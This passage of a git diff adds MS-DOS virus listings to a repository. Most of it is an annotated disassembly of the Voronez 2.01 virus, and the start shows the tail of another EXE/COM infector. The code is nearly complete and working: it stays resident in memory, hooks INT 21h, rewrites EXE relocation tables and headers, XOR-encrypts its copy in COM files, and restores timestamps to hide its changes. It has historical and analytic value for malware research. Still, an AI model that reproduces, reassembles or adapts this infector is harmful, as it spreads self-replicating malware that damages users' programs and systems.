ja 2769 + +2768 42 inc dx ; high word of file length + +2769 B90002 mov cx,0200 ; convert into 512 byte pages +276C F7F1 div cx +276E 83FA00 cmp dx,0000 ; last page non empty? +2771 7401 je 2774 + +2773 40 inc ax ; count last page + +; check if header information match to real file size + +2774 8B1E4407 mov bx,[0744] ; PageCnt +2778 8BC8 mov cx,ax ; new PageCnt +277A 29D9 sub cx,bx ; diference +277C 83F905 cmp cx,0005 ; maximum possible +277F 7205 jb 2786 ; OK, continue infection + +; there is some information above program in EXE file, do not infect such a +; file, exit + +2781 58 pop ax +2782 58 pop ax +2783 E9FE01 jmp 2984 + +; continue infection + +2786 A34407 mov [0744],ax ; PageCnt, store new value +2789 5A pop dx ; restore file length +278A 58 pop ax ; low word of file length +278B 8B1EB102 mov bx,[02B1] ; position of free relocation entry +278F 39D8 cmp ax,bx +2791 7205 jb 2798 + +; find length of file part above last entry in relocation table + +2793 29D8 sub ax,bx +2795 EB04 jmp 279B +2797 90 nop + +2798 29D8 sub ax,bx +279A 4A dec dx + +279B 8916BE02 mov [02BE],dx ; address of virus entry point (segment) +279F A3C002 mov [02C0],ax ; offset +27A2 A1B102 mov ax,[02B1] ; offset in relocation table +27A5 8B1EB302 mov bx,[02B3] ; IP +27A9 BA0000 mov dx,0000 ; prepare long integer addition +27AC 01D8 add ax,bx ; add long integer +27AE 39D8 cmp ax,bx +27B0 7701 ja 27B3 + +27B2 42 inc dx + +27B3 8BF0 mov si,ax ; offset of entry point +27B5 8BFA mov di,dx ; high word +27B7 A1B502 mov ax,[02B5] ; CS +27BA B91000 mov cx,0010 ; convert to bytes +27BD F7E1 mul cx +27BF 01D7 add di,dx ; high word +27C1 01C6 add si,ax ; low word +27C3 39C6 cmp si,ax +27C5 7701 ja 27C8 + +27C7 47 inc di + +; store distance in file between first free entry in relocation table and +; program entry point in disk file + +27C8 8BC6 mov ax,si +27CA 8BD7 mov dx,di +27CC 8916BA02 mov [02BA],dx +27D0 A3BC02 mov [02BC],ax + +; move file position to entry point + +27D3 8BCA mov cx,dx +27D5 8BD0 mov dx,ax +27D7 B80042 mov ax,4200 ; move file ptr +27DA C606B00201 mov byte ptr [02B0],01 ; flag: EXE file +27DF C606AF0200 mov byte ptr [02AF],00 ; buffer extension +27E4 5B pop bx ; handle +27E5 53 push bx +27E6 CD21 int 21 + +; read oryginal five bytes from entry point + +27E8 B90500 mov cx,0005 ; number of bytes +27EB 8D16AA02 lea dx,[02AA] ; local buffer +27EF B8003F mov ax,3F00 ; read file +27F2 CD21 int 21 + +27F4 803EAA029A cmp byte ptr [02AA],9A ; signature +27F9 7503 jne 27FE ; not infected, continue + +27FB E98601 jmp 2984 ; do not infect, exit + +; continue infection + +27FE E82302 call 2A24 ; clear attributes and reopen for read/write + +; move file ptr to first not used entry in relocation table + +2801 8B1E5807 mov bx,[0758] ; TableOff +2805 A14607 mov ax,[0746] ; ReloCnt +2808 48 dec ax ; count starts from zero +2809 B90400 mov cx,0004 ; entry size +280C F7E1 mul cx +280E 01C3 add bx,ax ; offset in table +2810 B90000 mov cx,0000 +2813 8BD3 mov dx,bx +2815 B80042 mov ax,4200 ; move file ptr to BOF +2818 5B pop bx ; handle +2819 53 push bx +281A CD21 int 21 + +; write new relocation table entry + +281C 8B16B302 mov dx,[02B3] ; IP +2820 83C203 add dx,0003 ; length of instruction code and offset +2823 8916B302 mov [02B3],dx ; pointer to segment word +2827 8D16B302 lea dx,[02B3] ; buffer with CS:IP +282B B90400 mov cx,0004 ; buffer size +282E B440 mov ah,40 ; write file +2830 5B pop bx ; handle +2831 53 push bx +2832 CD21 int 21 + +; restore IP in [02B3] + +2834 8B16B302 mov dx,[02B3] +2838 83EA03 sub dx,0003 +283B 8916B302 mov [02B3],dx + +; move file ptr to begin of file + +283F 31D2 xor dx,dx +2841 31C9 xor cx,cx +2843 B80042 mov ax,4200 ; move file ptr to BOF +2846 5B pop bx ; handle +2847 53 push bx +2848 CD21 int 21 + +; write new header to file + +284A 8B0E5807 mov cx,[0758] ; TableOff, number of bytes to write +284E 8D164007 lea dx,[0740] ; offset of buffer +2852 B440 mov ah,40 ; write file +2854 CD21 int 21 + +; form code for instruction of far call to virus + +2856 C606C2029A mov byte ptr [02C2],9A ; code for CALL ssss:oooo +285B A1C002 mov ax,[02C0] ; offset of virus entry point in RAM +285E A3C302 mov [02C3],ax ; store in buffer +2861 A1BE02 mov ax,[02BE] ; segment +2864 B90010 mov cx,1000 ; ?? +2867 F7E1 mul cx +2869 A3C502 mov [02C5],ax ; new segment +286C 813EC30200F0 cmp word ptr [02C3],F000 +2872 7215 jb 2889 + +; keep offset below F000 + +2874 A1C302 mov ax,[02C3] +2877 8B16C502 mov dx,[02C5] +287B 81C20001 add dx,0100 ; adjust segment +287F 2D0010 sub ax,1000 ; decrease offset +2882 8916C502 mov [02C5],dx ; store new values +2886 A3C302 mov [02C3],ax + +; write to disk new entry point code + +2889 8B0EBA02 mov cx,[02BA] ; virus entry point on disk file +288D 8B16BC02 mov dx,[02BC] +2891 B80042 mov ax,4200 ; move file ptr +2894 5B pop bx +2895 53 push bx +2896 CD21 int 21 + +2898 B90500 mov cx,0005 ; buffer length +289B B440 mov ah,40 ; write file +289D 8D16C202 lea dx,[02C2] ; buffeer with CALL SSSS:OOOO +28A1 CD21 int 21 + +; append to file virus code + +28A3 B90000 mov cx,0000 +28A6 BA0000 mov dx,0000 +28A9 B80242 mov ax,4202 ; move file ptr to EOF +28AC 5B pop bx ; handle +28AD 53 push bx +28AE CD21 int 21 + +28B0 B440 mov ah,40 ; write file +28B2 8B0E8302 mov cx,[0283] ; virus length +28B6 BA0001 mov dx,0100 ; offset of virus code in RAM +28B9 CD21 int 21 + +; analyse relocation table + +28BB 31C9 xor cx,cx +28BD 8B165807 mov dx,[0758] ; TablOff +28C1 B80042 mov ax,4200 ; move file ptr +28C4 5B pop bx ; handle +28C5 53 push bx +28C6 CD21 int 21 + +28C8 C706CD020000 mov word ptr [02CD],0000 +28CE 8916C702 mov [02C7],dx ; store file position +28D2 A3C902 mov [02C9],ax +28D5 A14607 mov ax,[0746] ; ReloCnt +28D8 BF0000 mov di,0000 +28DB 48 dec ax ; restore oryginal value +28DC 3D0000 cmp ax,0000 +28DF 7503 jne 28E4 ; analyse relocation table + +; if oryginal relocation table was empty then exit + +28E1 E9A000 jmp 2984 ; close file, restore attr etc. + +; find size of relocation table + +28E4 B90400 mov cx,0004 +28E7 F7E1 mul cx +28E9 8BF0 mov si,ax ; offset of last used entry + +; get current file position (this is the begin of relocation teble) + +28EB B90000 mov cx,0000 +28EE BA0000 mov dx,0000 +28F1 B80142 mov ax,4201 ; move file ptr rel current position +28F4 CD21 int 21 + +; read part of relocation table + +28F6 8916C702 mov [02C7],dx ; store file position +28FA A3C902 mov [02C9],ax +28FD B90001 mov cx,0100 ; number of bytes +2900 BA0000 mov dx,0000 ; buffer +2903 B8003F mov ax,3F00 ; read file +2906 CD21 int 21 + +2908 BF0000 mov di,0000 ; point at relocation table +290B A3CB02 mov [02CB],ax ; number of bytes readed +290E 0106CD02 add [02CD],ax ; total number of readed bytes + +; check relocation table entry + +2912 8B4502 mov ax,[di+02] ; get segment +2915 3B06B502 cmp ax,[02B5] ; is it CS +2919 7551 jne 296C ; check next entry + +291B 8B05 mov ax,[di] ; get offset +291D 3B06B302 cmp ax,[02B3] ; is it IP +2921 7249 jb 296C ; check next entry + +; relocatin item points at entry point or above + +2923 A1B302 mov ax,[02B3] ; IP +2926 050500 add ax,0005 ; length of far call +2929 3B05 cmp ax,[di] ; relocation item point inside call code +292B 763F jbe 296C ; no, consider next entry + +; modify relocation table and write it to file +; let relocation item point at the same code but now stored in virus +; body in local buffer + +292D A1C502 mov ax,[02C5] ; segment of virus entry point +2930 894502 mov [di+02],ax ; store in buffer +2933 8B05 mov ax,[di] ; offset +2935 8B1EB302 mov bx,[02B3] ; old IP +2939 29D8 sub ax,bx +293B 50 push ax ; store +293C B8AA02 mov ax,02AA ; offset of local buffer +293F 2D0001 sub ax,0100 ; offset in virus body +2942 8B1EC302 mov bx,[02C3] ; offset of entry point in RAM +2946 01D8 add ax,bx +2948 5B pop bx +2949 01D8 add ax,bx +294B 8905 mov [di],ax ; new offset +294D 8B0EC702 mov cx,[02C7] ; restore file position +2951 8B16C902 mov dx,[02C9] +2955 B80042 mov ax,4200 ; move file ptr +2958 5B pop bx ; restore handle +2959 53 push bx +295A CD21 int 21 + +295C 8B0ECB02 mov cx,[02CB] ; number of bytes +2960 B440 mov ah,40 ; write file +2962 5B pop bx ; handle +2963 53 push bx +2964 BA0000 mov dx,0000 ; from +2967 CD21 int 21 +2969 EB19 jmp 2984 ; close file, etc. exit +296B 90 nop + +296C 83C704 add di,0004 ; next entry in relocation table +296F A1CD02 mov ax,[02CD] ; number of readed bytes +2972 2D0001 sub ax,0100 ; buffer size +2975 01F8 add ax,di ; current position in table +2977 39F0 cmp ax,si ; table size +2979 7409 je 2984 ; close file, etc. exit + +297B 3B3ECB02 cmp di,[02CB] ; end of buffer? +297F 7291 jb 2912 ; no, check next relocation item + +2981 E967FF jmp 28EB ; read next part of relocation table + +2984 EB67 jmp 29ED ; close file, etc. and exit +2986 90 nop + +;------------------- +; infect COM file + +; check maximum file size + +2987 8B0E8102 mov cx,[0281] ; file size +298B 81F948EE cmp cx,EE48 ; maximum file size (61000) +298F 7209 jb 299A + +; file too long or too short, exit + +2991 5B pop bx +2992 58 pop ax +2993 58 pop ax +2994 E87A00 call 2A11 ; close file and restore INT 24h +2997 E937FB jmp 24D1 ; jump to old INT 21h + +; check minimum file size + +299A 3B0E8302 cmp cx,[0283] ; virus length, minimum file size +299E 72F1 jb 2991 ; file too short, exit + +29A0 E88100 call 2A24 ; clear attributes and reopen file +29A3 C606B00200 mov byte ptr [02B0],00 + +; get file size + +29A8 BA0000 mov dx,0000 +29AB B90000 mov cx,0000 +29AE B80242 mov ax,4202 ; move file ptr to EOF +29B1 5B pop bx ; restore handle +29B2 53 push bx +29B3 CD21 int 21 + +29B5 BE8302 mov si,0283 +29B8 8B0C mov cx,[si] ; virus size +29BA B440 mov ah,40 ; write file +29BC 51 push cx +29BD BB4007 mov bx,0740 ; offset of buffer + +; encrypt block + +29C0 8A07 mov al,[bx] +29C2 34BB xor al,BB +29C4 8807 mov [bx],al +29C6 43 inc bx +29C7 E2F7 loop 29C0 + +; write to file + +29C9 59 pop cx ; block size +29CA 5B pop bx ; handle +29CB 53 push bx +29CC BA4007 mov dx,0740 ; offset of buffer +29CF CD21 int 21 + +29D1 B80042 mov ax,4200 ; move file ptr to BOF +29D4 BA0000 mov dx,0000 +29D7 B90000 mov cx,0000 +29DA CD21 int 21 + +29DC BB1001 mov bx,0110 ; faked instruction + +29DF BE8302 mov si,0283 +29E2 8B0C mov cx,[si] +29E4 BA0001 mov dx,0100 +29E7 B440 mov ah,40 ; write file +29E9 5B pop bx ; handle +29EA 53 push bx +29EB CD21 int 21 + +; common (EXE and COM) exit code, restore file date/time stamp + +29ED 5B pop bx ; handle +29EE 5A pop dx ; file date stamp +29EF 59 pop cx ; file time stamp +29F0 53 push bx ; store handle +29F1 B80157 mov ax,5701 ; restore file time/date stamp +29F4 CD21 int 21 + +; restore file attributes + +29F6 8B16D402 mov dx,[02D4] ; path offset +29FA 8E1ED202 mov ds,[02D2] ; path segment +29FE B80143 mov ax,4301 ; set file attributes +2A01 2E8B0ED002 mov cx,cs:[02D0] ; restore attributes +2A06 CD21 int 21 + +2A08 0E push cs +2A09 1F pop ds +2A0A 5B pop bx ; handle +2A0B E80300 call 2A11 ; close file and restore INT 24h +2A0E E9C0FA jmp 24D1 ; jump to old INT 21h + +;------------------------------- +; close file and restore INT 24h + +2A11 B8003E mov ax,3E00 ; close file +2A14 CD21 int 21 + +;---------------- +; restore INT 24h + +2A16 8B1E8502 mov bx,[0285] +2A1A 8E068702 mov es,[0287] +2A1E B82425 mov ax,2524 ; restore INT 24h +2A21 CD21 int 21 +2A23 C3 ret + +;------------------------------------------------ +; clear file attributes and reopen for read/write + +2A24 55 push bp +2A25 8BEC mov bp,sp +2A27 1E push ds +2A28 B80143 mov ax,4301 ; set file attributes +2A2B 8B16D402 mov dx,[02D4] ; path offset +2A2F 8E1ED202 mov ds,[02D2] ; path segment +2A33 31C9 xor cx,cx ; clear all +2A35 CD21 int 21 + +2A37 7306 jnb 2A3F ; continue + +; exit to old INT 21h + +2A39 1F pop ds +2A3A 5D pop bp +2A3B 58 pop ax +2A3C E945FF jmp 2984 ; exit + +2A3F 368B5E04 mov bx,ss:[bp+04] ; restore handle +2A43 B8003E mov ax,3E00 ; close file +2A46 CD21 int 21 + +2A48 B8023D mov ax,3D02 ; open file for read/write +2A4B FA cli +2A4C 9C pushf +2A4D 2EFF1EC201 call far [01C2] ; old INT 21h +2A52 1F pop ds + +2A53 36894604 mov ss:[bp+04],ax ; handle +2A57 5D pop bp +2A58 C3 ret + +; end of file +;---------------------------------------- +; buffer for header of infected EXE file + +cs:0740 ; 'MZ' +cs:0742 ; PartPag +cs:0744 ; PageCnt +cs:0746 ; ReloCnt +cs:0748 ; HdrSize +cs:074a ; MinMem +cs:074c ; MaxMem +cs:074e ; ReloSS +cs:0750 ; ExeSP +cs:0752 ; ChkSum +cs:0754 ; ExeIP +cs:0756 ; ReloCS +cs:0758 ; TablOff +cs:075a ; Overlay + + diff --git a/MSDOS/Virus.MSDOS.Unknown.vor_1600.lst b/MSDOS/Virus.MSDOS.Unknown.vor_1600.lst new file mode 100644 index 00000000..7a0d586a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vor_1600.lst @@ -0,0 +1,1063 @@ +;======================================================= +; Virus Voronez 2.01 (August 1991 Zielona Gora, Poland) +; +; Disassembled by Andrzej Kadlof 1991 August +; +; (C) Polish Section Of Virus Information Bank +;======================================================= + +1EE6 9A19240657 call 5706:2419 + +; victim code + +1EEB 1E push ds +1EEC B82325 mov ax,2523 + +;... +; +;------------------- +; virus entry point + +2419 8CD8 mov ax,ds +241B 0E push cs +241C 1F pop ds +241D 50 push ax +241E E80000 call 2421 ; get own offset +2421 5B pop bx + +2422 81EB0801 sub bx,0108 ; virus base +2426 53 push bx + +; is virus present in RAM? + +2427 B4AB mov ah,AB ; call for resident part +2429 CD21 int 21 + +242B 3D5555 cmp ax,5555 ; expected answer +242E 7503 jne 2433 ; not instaled + +2430 E9D000 jmp 2503 ; instaled, exit + +; install wirus in RAM + +2433 8CC0 mov ax,es ; PSP segment +2435 2D0100 sub ax,0001 ; MCB segment +2438 8ED8 mov ds,ax +243A BB0300 mov bx,0003 ; offset of size of block in MCB +243D 3E8B07 mov ax,ds:[bx] ; get size +2440 2DEA00 sub ax,00EA ; reserve 0EA0h bytes for virus (3744) +2443 3E8907 mov ds:[bx],ax ; store new block size +2446 06 push es ; restore DS +2447 1F pop ds +2448 BB0200 mov bx,0002 ; offset of MEM size in PSP +244B 3E8B07 mov ax,ds:[bx] ; get MEM size +244E 2DEA00 sub ax,00EA ; decrease by 3744 bytes +2451 3E8907 mov ds:[bx],ax ; set new value in PSP +2454 8EC0 mov es,ax ; segment for new virus location +2456 BF0001 mov di,0100 ; offset of destination +2459 BE0001 mov si,0100 ; offset of source +245C 5B pop bx ; virus base +245D 53 push bx +245E 01DE add si,bx ; start of virus code +2460 0E push cs ; set DS to virus code +2461 1F pop ds +2462 B9A406 mov cx,06A4 ; length (1700) +2465 F3A4 rep movsb ; move to new place +2467 8BD0 mov dx,ax ; segment of new location +2469 EB74 jmp 24DF ; continue +246B 90 nop + +;------------------ +; INT 21h handler + +246C 9C pushf +246D FB sti +246E 80FCAB cmp ah,AB ; virus call +2471 7505 jne 2478 ; no + +2473 B85555 mov ax,5555 ; answer: I'm here +2476 9D popf +2477 CF iret + +2478 3D003D cmp ax,3D00 ; open file for read only +247B 7540 jne 24BD + +; open file for read only + +247D 50 push ax +247E 53 push bx +247F 51 push cx +2480 52 push dx +2481 56 push si +2482 57 push di +2483 06 push es +2484 B94100 mov cx,0041 ; maximum path length +2487 30C0 xor al,al +2489 8BFA mov di,dx ; offset of path +248B 1E push ds +248C 07 pop es +248D F2AE repnz scasb ; find end of string +248F 83EF04 sub di,0004 ; point at extension +2492 8BF7 mov si,di +2494 56 push si ; offset of extension +2495 0E push cs +2496 07 pop es +2497 B90400 mov cx,0004 ; extension length +249A BF8902 mov di,0289 ; is it EXE? +249D F3A6 rep cmpsb +249F 83F900 cmp cx,0000 +24A2 7504 jne 24A8 + +24A4 5E pop si ; balance stack +24A5 EB0D jmp 24B4 ; skip exe comparison +24A7 90 nop + +24A8 BF8C02 mov di,028C ; is it exe? +24AB B90400 mov cx,0004 +24AE 5E pop si ; offset of extension +24AF F3A6 rep cmpsb +24B1 83F900 cmp cx,0000 + +; restore callers registers + +24B4 07 pop es +24B5 5F pop di +24B6 5E pop si +24B7 5A pop dx +24B8 59 pop cx +24B9 5B pop bx +24BA 58 pop ax +24BB 7409 je 24C6 ; exe file, contaminate it! + +; not EXE file, maybe COM or subfunction <> 3D00h + +24BD 50 push ax ; store subfunction code +24BE FEC4 inc ah ; hide 4B00h comparison +24C0 3D004C cmp ax,4C00 ; "terminate" proces +24C3 58 pop ax ; restore subfunction +24C4 7513 jne 24D9 ; jump to old INT 21h + +; EXE file will be open for read only or any file will be loaded and executed +; store caller registers again + +24C6 50 push ax +24C7 53 push bx +24C8 51 push cx +24C9 52 push dx +24CA 56 push si +24CB 57 push di +24CC 06 push es +24CD 1E push ds +24CE E91F01 jmp 25F0 ; contaminate + +; jump to old INT 21h + +24D1 1F pop ds +24D2 07 pop es +24D3 5F pop di +24D4 5E pop si +24D5 5A pop dx +24D6 59 pop cx +24D7 5B pop bx +24D8 58 pop ax + +24D9 9D popf +24DA EA60147902 jmp 0279:1460 ; old INT 21h + +; ^^^^^^^^ old INT 21h (place holder) +;--------------------- +; continue instalation + +; get INT 21h + +24DF 8EDA mov ds,dx ; DS points at new virus location +24E1 B82135 mov ax,3521 +24E4 CD21 int 21 +24E6 3E891EC201 mov ds:[01C2],bx ; modify own code +24EB 3E8C06C401 mov ds:[01C4],es +24F0 3E891E7503 mov ds:[0375],bx +24F5 3E8C067703 mov ds:[0377],es + +; set new INT 21h + +24FA 8D165301 lea dx,[0153] ; here 246C +24FE B82125 mov ax,2521 +2501 CD21 int 21 + +2503 5A pop dx ; virus base +2504 BBB002 mov bx,02B0 ; offset of working varible +2507 01D3 add bx,dx ; add base +2509 2E803F00 cmp byte ptr [bx],00 ; carrier type +250D 7441 je 2550 ; carrier is COM file + +; carrier is EXE file + +250F 1F pop ds ; restore DS +2510 8CD8 mov ax,ds ; store new virus segment +2512 0E push cs +2513 1F pop ds +2514 8BCA mov cx,dx +2516 5F pop di ; entry point offset +2517 07 pop es ; entry point segment +2518 50 push ax +2519 83EF05 sub di,0005 ; length of FAR CALL + +; improper handling of the case when relocation item points exactly at +; fifth byte of stored code + +251C BEAF02 mov si,02AF ; extension of buffer +251F 01CE add si,cx ; virus base +2521 8A14 mov dl,[si] ; get sixth byte, this byte may by + ; changed during relocation proces + +; this byte should be added to sixth byte in file (counting from entry point) + +2523 26005505 add es:[di+05],dl ; add key +2527 26385505 cmp es:[di+05],dl ; was DL = 0? +252B 7703 ja 2530 ; jump if no + +252D 4E dec si +252E FE04 inc byte ptr [si] + +2530 8BD7 mov dx,di ; destination +2532 BEAA02 mov si,02AA ; source buffer +2535 01CE add si,cx ; add base +2537 B90500 mov cx,0005 ; number of bytes +253A F3A4 rep movsb +253C 1F pop ds + +253D 06 push es ; prepare long jump +253E 52 push dx +253F 8CD8 mov ax,ds ; reset registers +2541 8EC0 mov es,ax +2543 31C0 xor ax,ax +2545 31DB xor bx,bx +2547 31C9 xor cx,cx +2549 31D2 xor dx,dx +254B 31F6 xor si,si +254D 31FF xor di,di +254F CB retf ; jump to application + +; exit to COM application + +2550 8CC8 mov ax,cs +2552 8ED8 mov ds,ax +2554 8EC0 mov es,ax +2556 BE6802 mov si,0268 ; offset of encryption routine +2559 B90001 mov cx,0100 ; number of bytes +255C BB8102 mov bx,0281 ; file size +255F 8B3F mov di,[bx] +2561 83FF00 cmp di,0000 ; ?? +2564 7502 jne 2568 + +2566 CD20 int 20 ; terminate + +; form destination address + +2568 BB8302 mov bx,0283 ; place holder for virus length +256B 8B07 mov ax,[bx] ; virus length +256D 01C7 add di,ax ; add to file size +256F 81C70001 add di,0100 ; size of PSP +2573 FC cld +2574 57 push di ; destination address +2575 F3A4 rep movsb ; move part of code +2577 5F pop di ; restore address +2578 8B0E8302 mov cx,[0283] ; virus size +257C A18102 mov ax,[0281] ; file length +257F 57 push di ; prepare jump +2580 C3 ret ; jump to moved code (here 2581) + +;-------------------- +; encryption routine + +2581 050001 add ax,0100 ; PSP size +2584 8BF0 mov si,ax ; offset of encrypted block +2586 BF0001 mov di,0100 ; destination +2589 FC cld + +; decrypt block and copy it to begin of file + +258A 8A04 mov al,[si] +258C 34BB xor al,BB +258E 8805 mov [di],al +2590 46 inc si +2591 47 inc di +2592 E2F6 loop 258A + +; jump to application + +2594 B80001 mov ax,0100 ; entry point for EXE +2597 5B pop bx ; balance stack +2598 50 push ax ; prepare jump +2599 C3 ret ; jump to COM + +; working area + +259A 1926 ; [base + 0281] low word of file size +259C 4006 ; [base + 0283] size of virus, (high word of file length) +259E 014C ; [base + 0285] old INT 24h (offset) +25A0 169F ; [base + 0287] old INT 24h (segment) + +25A2 45 58 45 ; [base + 0289] 'EXE' +25A5 65 78 65 ; [base + 028C] 'exe' + +; unused + +; below line after xoring with 1A become: OleynikozL - name of the wirus author + +25A8 55 76 7F 63 74 73 71 75 60 56 ; Uvctsqu` + +25B1 56 6F 72 6F 6E 65 7A 68 2C ; Voronezh, +25BA 31 39 39 30 20 32 2E 30 31 ; 1990 2.01 + +; used data + +25C3 FC 0E 1F BA BB ; [base + 02AA] starting 5 bytes of EXE file +25C8 00 ; [base + 02AF] this byte is added to 02AE + ; if it is 0 then [02AE] is decreased by 1 +25C9 01 ; [base + 02B0] carrier type: 0 - EXE, 1 - COM + +25CA 0002 ; [base + 02B1] offset in header for new relocation entry +25CC E61E ; [base + 02B3] IP of EXE file +25CE 0000 ; [base + 02B5] CS of EXE file +25D0 0000 +25D2 00 +25D3 0000 ; [base + 02BA] virus entry point in file on disk +25D5 E620 ; [base + 02BC] - [02B1] +25D7 0000 ; [base + 02BE] segment of virus entry point +25D9 1924 ; [base + 02C0] offset +25DB 9A ; [base + 02C2] code of CALL SSSS:OOOO +25DC 1924 ; [base + 02C3] OOOO +25DE 0000 ; [base + 02C5] SSSS +25E0 0000 ; [base + 02C7] file position low word +25E2 1E00 ; [base + 02C9] file position high word +25E4 0001 ; [base + 02CB] size of buffer +25E6 0000 ; [base + 02CD] total size of readed part of ReloTabl +25E8 00 ; [base + 02CF] number of disk (0 - default, 1 - A, ...) +25E9 2000 ; [base + 02D0] file attributes +25EB B438 ; [base + 02D2] offset of file name +25ED 0F4C ; [base + 02D4] segment of file name + +;----------------- +; INT 24h handler + +25EF CF iret + +; jump here if EXE file is open or sam program is loaded and executed + +; check file name, skip file if fourth and fifth characters in path are 'CO' + +25F0 8BDA mov bx,dx ; offset of path +25F2 3E8B4703 mov ax,ds:[bx+03] ; skip 'd:\' (?) +25F6 3D434F cmp ax,4F43 ; 'CO' protect 'C:\COMMAND.COM' ? +25F9 7503 jne 25FE + +25FB E9D3FE jmp 24D1 ; jump to old INT 21h + +; check presence of disk specyfication + +25FE 8BFA mov di,dx ; offset of path +2600 31C0 xor ax,ax +2602 2EC606CF0200 mov byte ptr [02CF],00 ; default +2608 3E807D013A cmp ds:byte ptr [di+01],3A ; ':' is disk specified? +260D 7509 jne 2618 ; no + +; convert disk specyfication to number (A - 1, B - 2, ...) + +260F 3E8A05 mov al,ds:[di] +2612 249F and al,9F ; convert +2614 2EA2CF02 mov [02CF],al ; store disk number + +2618 B80043 mov ax,4300 ; get file attributes +261B CD21 int 21 + +; store address of path and file attributes + +261D 2E890ED002 mov [02D0],cx +2622 2E8C1ED202 mov [02D2],ds +2627 2E8916D402 mov [02D4],dx + +; intercepte INT 24h + +262C 1E push ds +262D 52 push dx +262E 06 push es + +262F 0E push cs +2630 1F pop ds +2631 B82435 mov ax,3524 +2634 CD21 int 21 +2636 891E8502 mov [0285],bx +263A 8C068702 mov [0287],es + +263E BAD602 mov dx,02D6 +2641 B82425 mov ax,2524 +2644 CD21 int 21 + +2646 07 pop es +2647 5A pop dx +2648 1F pop ds + +2649 1E push ds + +264A 0E push cs +264B 1F pop ds + +264C BB0001 mov bx,0100 +264F B94007 mov cx,0740 ; offset of buffer +2652 29D9 sub cx,bx ; virus length +2654 BB8302 mov bx,0283 ; offset of varible +2657 890F mov [bx],cx ; size of virus/crypted block + +2659 1F pop ds + +265A 8BDA mov bx,dx ; waste of time +265C 1E push ds ; store address of path +265D 52 push dx +265E 53 push bx ; waste of time + +265F 0E push cs +2660 1F pop ds + +2661 B436 mov ah,36 ; disk free +2663 8A16CF02 mov dl,[02CF] ; disk number +2667 CD21 int 21 + +2669 3DFFFF cmp ax,FFFF ; check for error +266C 7509 jne 2677 ; ok + +; disk not accessible, exit + +266E 58 pop ax ; balance stack +266F 58 pop ax +2670 58 pop ax +2671 E8A203 call 2A16 ; restore INT 24h +2674 E95AFE jmp 24D1 ; jump to old INT 21h + +; convert disk free space into bytes + +2677 F7E3 mul bx +2679 F7E1 mul cx +267B 09D2 or dx,dx +267D 7506 jne 2685 ; plenty of free room + +267F 3B068302 cmp ax,[0283] ; minimum disk free space +2683 72E9 jb 266E ; disk full, exit + +2685 5B pop bx ; balance stack +2686 5A pop dx ; path address +2687 1F pop ds +2688 B8003D mov ax,3D00 ; open file for read only +268B 9C pushf +268C FA cli +268D 9A60147902 call 0279:1460 ; old INT 21h + +; ^^^^^^^^ old INT 21h (place holder) + +2692 7306 jnb 269A ; OK + +2694 E87F03 call 2A16 ; restore INT 24h +2697 E937FE jmp 24D1 ; jump to old INT 21h + +269A 50 push ax ; store handle +269B 8CC8 mov ax,cs ; set DS and ES to virus segment +269D 8ED8 mov ds,ax +269F 8EC0 mov es,ax +26A1 58 pop ax ; restore handle +26A2 50 push ax ; store handle +26A3 8BD8 mov bx,ax +26A5 B80057 mov ax,5700 ; get file time/date stamp +26A8 CD21 int 21 + +26AA 58 pop ax ; restore handle +26AB 51 push cx ; attributes +26AC 52 push dx ; offset of path +26AD 50 push ax ; handle + +; get file size + +26AE 8BD8 mov bx,ax ; handle +26B0 B90000 mov cx,0000 +26B3 BA0000 mov dx,0000 +26B6 B442 mov ah,42 ; move file ptr +26B8 B002 mov al,02 ; to EOF +26BA CD21 int 21 + +26BC BB8102 mov bx,0281 ; store low word of file length +26BF 8907 mov [bx],ax + +; waste of time or programmers error + +26C1 BB8302 mov bx,0283 ; 'store' high word of file length +26C4 8B0F mov cx,[bx] ; <- error (?), maybe: mov [bx],cx ? + +; move file ptr to BOF + +26C6 B90000 mov cx,0000 +26C9 BA0000 mov dx,0000 +26CC B80042 mov ax,4200 ; move file ptr to BOF +26CF 5B pop bx ; restore handle +26D0 53 push bx +26D1 CD21 int 21 + +; read [0283] bytes of file to buffer located above virus + +26D3 BB8302 mov bx,0283 ; working varible +26D6 8B0F mov cx,[bx] ; length of virus/encrypted block +26D8 5B pop bx ; restore handle +26D9 53 push bx +26DA BA4007 mov dx,0740 ; buffer +26DD B43F mov ah,3F ; read file +26DF CD21 int 21 + +26E1 BE4007 mov si,0740 ; buffer +26E4 8B0C mov cx,[si] ; first word +26E6 81F98CD8 cmp cx,D88C ; signature in COM file +26EA 7509 jne 26F5 ; clear COM or EXE file + +; this is infected COM file, exit + +26EC 5B pop bx ; handle +26ED 58 pop ax ; balance stack +26EE 58 pop ax +26EF E81F03 call 2A11 ; close file and restore INT 24h +26F2 E9DCFD jmp 24D1 ; jump to old INT 21h + +; is it EXE file or clear COM? + +26F5 81F94D5A cmp cx,5A4D ; EXE marker +26F9 7403 je 26FE ; yes + +26FB E98902 jmp 2987 ; infect COM file + +; check EXE file + +26FE 5B pop bx ; restore handle +26FF 53 push bx +2700 B80042 mov ax,4200 ; move file ptr to BOF +2703 31C9 xor cx,cx +2705 31D2 xor dx,dx +2707 CD21 int 21 + +2709 B93200 mov cx,0032 ; block size +270C B8003F mov ax,3F00 ; read file +270F 8D164007 lea dx,[0740] ; buffer +2713 CD21 int 21 + +; check free place in relocation table + +2715 A14607 mov ax,[0746] ; ReloCnt +2718 B90400 mov cx,0004 ; entry size +271B F7E1 mul cx ; AX size of relocation table +271D 8B1E5807 mov bx,[0758] ; TablOff +2721 01D8 add ax,bx +2723 8BD0 mov dx,ax ; size of used area in header +2725 8BFA mov di,dx +2727 A14807 mov ax,[0748] ; HdrSize +272A B91000 mov cx,0010 ; convert to bytes +272D F7E1 mul cx +272F 8BD7 mov dx,di ; used header size +2731 83C204 add dx,0004 ; one additional entry +2734 39D0 cmp ax,dx ; is free space? +2736 7703 ja 273B ; yes + +2738 E94902 jmp 2984 ; relocation table is full, exit + +; prepare new header + +273B A3B102 mov [02B1],ax ; offset of first unused entry +273E A14607 mov ax,[0746] ; ReloCnt +2741 40 inc ax ; add one entry +2742 A34607 mov [0746],ax ; ReloCnt, store new value of counter +2745 A15407 mov ax,[0754] ; IP +2748 A3B302 mov [02B3],ax ; store oryginal IP +274B A15607 mov ax,[0756] ; CS +274E A3B502 mov [02B5],ax ; store oryginal CS +2751 31D2 xor dx,dx +2753 31C9 xor cx,cx +2755 B80242 mov ax,4202 ; move file ptr to EOF +2758 5B pop bx ; restore handle +2759 53 push bx +275A CD21 int 21 + +275C 50 push ax ; store file length +275D 52 push dx +275E 03068302 add 